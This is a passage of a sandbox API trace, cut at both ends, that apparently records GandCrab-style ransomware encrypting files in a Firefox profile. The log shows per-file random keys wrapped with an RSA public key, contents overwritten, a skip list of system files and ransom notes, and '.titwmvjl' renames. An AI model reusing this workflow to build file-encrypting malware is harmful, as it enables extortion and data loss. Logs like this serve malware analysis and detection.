(lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2650000 [0080.540] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0080.540] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0080.540] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x8, pbBuffer=0x259e768 | out: pbBuffer=0x259e768) returned 1 [0080.540] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0080.540] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0080.540] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.541] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0080.541] CryptAcquireContextW (in: phProv=0x259e6b0, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e6b0*=0x4cdb38) returned 1 [0080.544] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0080.545] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e6b4 | out: phKey=0x259e6b4*=0x503738) returned 1 [0080.545] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0080.545] CryptGetKeyParam (in: hKey=0x503738, dwParam=0x8, pbData=0x259e6a8, pdwDataLen=0x259e6ac, dwFlags=0x0 | out: pbData=0x259e6a8*=0x800, pdwDataLen=0x259e6ac*=0x4) returned 1 [0080.545] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0080.545] CryptEncrypt (in: hKey=0x503738, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630000*, pdwDataLen=0x259e6e0*=0xc8, dwBufLen=0x100 | out: pbData=0x2630000*, pdwDataLen=0x259e6e0*=0x100) returned 1 [0080.546] GetLastError () returned 0x0 [0080.546] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0080.546] CryptDestroyKey (hKey=0x503738) returned 1 [0080.546] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0080.546] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0080.546] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0080.546] CryptAcquireContextW (in: phProv=0x259e6b0, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e6b0*=0x4cdb38) returned 1 [0080.550] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0080.550] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e6b4 | out: phKey=0x259e6b4*=0x503738) returned 1 [0080.550] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0080.550] CryptGetKeyParam (in: hKey=0x503738, dwParam=0x8, pbData=0x259e6a8, pdwDataLen=0x259e6ac, dwFlags=0x0 | out: pbData=0x259e6a8*=0x800, pdwDataLen=0x259e6ac*=0x4) returned 1 [0080.550] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0080.551] CryptEncrypt (in: hKey=0x503738, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630100*, pdwDataLen=0x259e6e0*=0xc8, dwBufLen=0x100 | out: pbData=0x2630100*, pdwDataLen=0x259e6e0*=0x100) returned 1 [0080.551] GetLastError () returned 0x0 [0080.551] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0080.551] CryptDestroyKey (hKey=0x503738) returned 1 [0080.551] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0080.551] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0080.551] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0080.552] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0080.552] ReadFile (in: hFile=0x2d4, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259e78c, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259e78c*=0x329, lpOverlapped=0x0) returned 1 [0080.653] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0xfffffcd7, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.653] WriteFile (in: hFile=0x2d4, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x329, lpNumberOfBytesWritten=0x259e770, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259e770*=0x329, lpOverlapped=0x0) returned 1 [0080.660] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.660] WriteFile (in: hFile=0x2d4, lpBuffer=0x2630000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259e770, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesWritten=0x259e770*=0x21c, lpOverlapped=0x0) returned 1 [0080.661] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.665] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.665] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.665] CloseHandle (hObject=0x2d4) returned 1 [0080.667] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\containers.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\containers.json"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\containers.json.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\containers.json.titwmvjl"), dwFlags=0x1) returned 1 [0080.667] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.667] FindNextFileW (in: hFindFile=0x5033f8, lpFindFileData=0x259e840 | out: lpFindFileData=0x259e840) returned 1 [0080.667] lstrcmpW (lpString1="content-prefs.sqlite", lpString2=".") returned 1 [0080.667] lstrcmpW (lpString1="content-prefs.sqlite", lpString2="..") returned 1 [0080.668] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\", lpString2="content-prefs.sqlite" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\content-prefs.sqlite") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\content-prefs.sqlite" [0080.668] lstrlenW (lpString=".titwmvjl") returned 9 [0080.668] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\content-prefs.sqlite") returned 100 [0080.668] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0080.668] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\content-prefs.sqlite.titwmvjl") returned 109 [0080.668] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\content-prefs.sqlite") returned 100 [0080.669] lstrlenW (lpString=".sqlite") returned 7 [0080.669] VirtualAlloc (lpAddress=0x0, dwSize=0x12, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0080.669] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".sqlite ") returned 8 [0080.669] lstrcmpiW (lpString1=".sqlite", lpString2=".titwmvjl") returned -1 [0080.669] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.669] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\content-prefs.sqlite") returned 100 [0080.669] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\content-prefs.sqlite") returned 100 [0080.669] lstrcmpiW (lpString1="content-prefs.sqlite", lpString2="desktop.ini") returned -1 [0080.669] lstrcmpiW (lpString1="content-prefs.sqlite", lpString2="autorun.inf") returned 1 [0080.669] lstrcmpiW (lpString1="content-prefs.sqlite", lpString2="ntuser.dat") returned -1 [0080.669] lstrcmpiW (lpString1="content-prefs.sqlite", lpString2="iconcache.db") returned -1 [0080.669] lstrcmpiW (lpString1="content-prefs.sqlite", lpString2="bootsect.bak") returned 1 [0080.669] lstrcmpiW (lpString1="content-prefs.sqlite", lpString2="boot.ini") returned 1 [0080.669] lstrcmpiW (lpString1="content-prefs.sqlite", lpString2="ntuser.dat.log") returned -1 [0080.669] lstrcmpiW (lpString1="content-prefs.sqlite", lpString2="thumbs.db") returned -1 [0080.669] lstrcmpiW (lpString1="content-prefs.sqlite", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0080.669] lstrcmpiW (lpString1="content-prefs.sqlite", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0080.669] lstrcmpiW (lpString1="content-prefs.sqlite", lpString2="KRAB-DECRYPT.html") returned -1 [0080.669] lstrcmpiW (lpString1="content-prefs.sqlite", lpString2="CRAB-DECRYPT.html") returned -1 [0080.669] lstrcmpiW (lpString1="content-prefs.sqlite", lpString2="KRAB-DECRYPT.txt") returned -1 [0080.669] lstrcmpiW (lpString1="content-prefs.sqlite", lpString2="CRAB-DECRYPT.txt") returned -1 [0080.669] lstrcmpiW (lpString1="content-prefs.sqlite", lpString2="ntldr") returned -1 [0080.669] lstrcmpiW (lpString1="content-prefs.sqlite", lpString2="NTDETECT.COM") returned -1 [0080.670] lstrcmpiW (lpString1="content-prefs.sqlite", lpString2="Bootfont.bin") returned 1 [0080.670] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\content-prefs.sqlite") returned 100 [0080.670] lstrlenW (lpString=".sqlite") returned 7 [0080.670] VirtualAlloc (lpAddress=0x0, dwSize=0x12, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0080.670] wsprintfW (in: param_1=0x2630000, param_2="%s " | out: param_1=".sqlite ") returned 8 [0080.670] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.670] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0080.670] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\content-prefs.sqlite" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\content-prefs.sqlite"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2d4 [0080.671] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.671] ReadFile (in: hFile=0x2d4, lpBuffer=0x2630000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259e78c, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesRead=0x259e78c*=0x21c, lpOverlapped=0x0) returned 1 [0080.680] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.680] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0080.680] CryptAcquireContextW (in: phProv=0x259e6bc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e6bc*=0x4cdb38) returned 1 [0080.683] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2650000 [0080.683] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0080.683] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0080.683] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x20, pbBuffer=0x259e748 | out: pbBuffer=0x259e748) returned 1 [0080.683] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0080.683] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0080.683] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.684] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0080.684] CryptAcquireContextW (in: phProv=0x259e6bc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e6bc*=0x4cdb38) returned 1 [0080.686] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2650000 [0080.687] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0080.687] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0080.687] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x8, pbBuffer=0x259e768 | out: pbBuffer=0x259e768) returned 1 [0080.687] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0080.687] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0080.687] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.687] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0080.687] CryptAcquireContextW (in: phProv=0x259e6b0, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e6b0*=0x4cdb38) returned 1 [0080.690] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0080.690] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e6b4 | out: phKey=0x259e6b4*=0x503738) returned 1 [0080.690] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0080.690] CryptGetKeyParam (in: hKey=0x503738, dwParam=0x8, pbData=0x259e6a8, pdwDataLen=0x259e6ac, dwFlags=0x0 | out: pbData=0x259e6a8*=0x800, pdwDataLen=0x259e6ac*=0x4) returned 1 [0080.690] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0080.690] CryptEncrypt (in: hKey=0x503738, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630000*, pdwDataLen=0x259e6e0*=0xc8, dwBufLen=0x100 | out: pbData=0x2630000*, pdwDataLen=0x259e6e0*=0x100) returned 1 [0080.691] GetLastError () returned 0x0 [0080.691] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0080.691] CryptDestroyKey (hKey=0x503738) returned 1 [0080.691] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0080.691] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0080.691] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0080.691] CryptAcquireContextW (in: phProv=0x259e6b0, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e6b0*=0x4cdb38) returned 1 [0080.694] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0080.694] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e6b4 | out: phKey=0x259e6b4*=0x503638) returned 1 [0080.694] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0080.694] CryptGetKeyParam (in: hKey=0x503638, dwParam=0x8, pbData=0x259e6a8, pdwDataLen=0x259e6ac, dwFlags=0x0 | out: pbData=0x259e6a8*=0x800, pdwDataLen=0x259e6ac*=0x4) returned 1 [0080.694] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0080.695] CryptEncrypt (in: hKey=0x503638, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630100*, pdwDataLen=0x259e6e0*=0xc8, dwBufLen=0x100 | out: pbData=0x2630100*, pdwDataLen=0x259e6e0*=0x100) returned 1 [0080.695] GetLastError () returned 0x0 [0080.695] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0080.695] CryptDestroyKey (hKey=0x503638) returned 1 [0080.695] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0080.695] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0080.695] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0080.695] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0080.696] ReadFile (in: hFile=0x2d4, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259e78c, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259e78c*=0x38000, lpOverlapped=0x0) returned 1 [0080.718] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0xfffc8000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.718] WriteFile (in: hFile=0x2d4, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x38000, lpNumberOfBytesWritten=0x259e770, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259e770*=0x38000, lpOverlapped=0x0) returned 1 [0080.730] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.730] WriteFile (in: hFile=0x2d4, lpBuffer=0x2630000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259e770, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesWritten=0x259e770*=0x21c, lpOverlapped=0x0) returned 1 [0080.742] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.746] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.747] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.747] CloseHandle (hObject=0x2d4) returned 1 [0080.752] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\content-prefs.sqlite" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\content-prefs.sqlite"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\content-prefs.sqlite.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\content-prefs.sqlite.titwmvjl"), dwFlags=0x1) returned 1 [0080.755] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.755] FindNextFileW (in: hFindFile=0x5033f8, lpFindFileData=0x259e840 | out: lpFindFileData=0x259e840) returned 1 [0080.755] lstrcmpW (lpString1="cookies.sqlite", lpString2=".") returned 1 [0080.755] lstrcmpW (lpString1="cookies.sqlite", lpString2="..") returned 1 [0080.755] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\", lpString2="cookies.sqlite" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cookies.sqlite") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cookies.sqlite" [0080.755] lstrlenW (lpString=".titwmvjl") returned 9 [0080.755] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cookies.sqlite") returned 94 [0080.755] VirtualAlloc (lpAddress=0x0, dwSize=0xfc, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0080.756] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cookies.sqlite.titwmvjl") returned 103 [0080.756] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cookies.sqlite") returned 94 [0080.756] lstrlenW (lpString=".sqlite") returned 7 [0080.756] VirtualAlloc (lpAddress=0x0, dwSize=0x12, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0080.756] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".sqlite ") returned 8 [0080.756] lstrcmpiW (lpString1=".sqlite", lpString2=".titwmvjl") returned -1 [0080.756] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.756] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cookies.sqlite") returned 94 [0080.756] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cookies.sqlite") returned 94 [0080.756] lstrcmpiW (lpString1="cookies.sqlite", lpString2="desktop.ini") returned -1 [0080.756] lstrcmpiW (lpString1="cookies.sqlite", lpString2="autorun.inf") returned 1 [0080.756] lstrcmpiW (lpString1="cookies.sqlite", lpString2="ntuser.dat") returned -1 [0080.756] lstrcmpiW (lpString1="cookies.sqlite", lpString2="iconcache.db") returned -1 [0080.756] lstrcmpiW (lpString1="cookies.sqlite", lpString2="bootsect.bak") returned 1 [0080.756] lstrcmpiW (lpString1="cookies.sqlite", lpString2="boot.ini") returned 1 [0080.756] lstrcmpiW (lpString1="cookies.sqlite", lpString2="ntuser.dat.log") returned -1 [0080.756] lstrcmpiW (lpString1="cookies.sqlite", lpString2="thumbs.db") returned -1 [0080.756] lstrcmpiW (lpString1="cookies.sqlite", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0080.756] lstrcmpiW (lpString1="cookies.sqlite", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0080.756] lstrcmpiW (lpString1="cookies.sqlite", lpString2="KRAB-DECRYPT.html") returned -1 [0080.756] lstrcmpiW (lpString1="cookies.sqlite", lpString2="CRAB-DECRYPT.html") returned -1 [0080.756] lstrcmpiW (lpString1="cookies.sqlite", lpString2="KRAB-DECRYPT.txt") returned -1 [0080.756] lstrcmpiW (lpString1="cookies.sqlite", lpString2="CRAB-DECRYPT.txt") returned -1 [0080.757] lstrcmpiW (lpString1="cookies.sqlite", lpString2="ntldr") returned -1 [0080.757] lstrcmpiW (lpString1="cookies.sqlite", lpString2="NTDETECT.COM") returned -1 [0080.757] lstrcmpiW (lpString1="cookies.sqlite", lpString2="Bootfont.bin") returned 1 [0080.757] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cookies.sqlite") returned 94 [0080.757] lstrlenW (lpString=".sqlite") returned 7 [0080.757] VirtualAlloc (lpAddress=0x0, dwSize=0x12, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0080.757] wsprintfW (in: param_1=0x2630000, param_2="%s " | out: param_1=".sqlite ") returned 8 [0080.757] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.757] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0080.757] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cookies.sqlite" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\cookies.sqlite"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2d4 [0080.758] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.758] ReadFile (in: hFile=0x2d4, lpBuffer=0x2630000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259e78c, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesRead=0x259e78c*=0x21c, lpOverlapped=0x0) returned 1 [0080.759] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.759] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0080.759] CryptAcquireContextW (in: phProv=0x259e6bc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e6bc*=0x4cdb38) returned 1 [0080.762] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2650000 [0080.762] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0080.762] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0080.762] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x20, pbBuffer=0x259e748 | out: pbBuffer=0x259e748) returned 1 [0080.763] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0080.763] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0080.763] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.763] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0080.763] CryptAcquireContextW (in: phProv=0x259e6bc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e6bc*=0x4cdb38) returned 1 [0080.766] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2650000 [0080.766] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0080.767] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0080.767] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x8, pbBuffer=0x259e768 | out: pbBuffer=0x259e768) returned 1 [0080.767] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0080.767] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0080.767] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.767] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0080.767] CryptAcquireContextW (in: phProv=0x259e6b0, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e6b0*=0x4cdb38) returned 1 [0080.770] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0080.770] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e6b4 | out: phKey=0x259e6b4*=0x503738) returned 1 [0080.771] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0080.771] CryptGetKeyParam (in: hKey=0x503738, dwParam=0x8, pbData=0x259e6a8, pdwDataLen=0x259e6ac, dwFlags=0x0 | out: pbData=0x259e6a8*=0x800, pdwDataLen=0x259e6ac*=0x4) returned 1 [0080.771] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0080.771] CryptEncrypt (in: hKey=0x503738, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630000*, pdwDataLen=0x259e6e0*=0xc8, 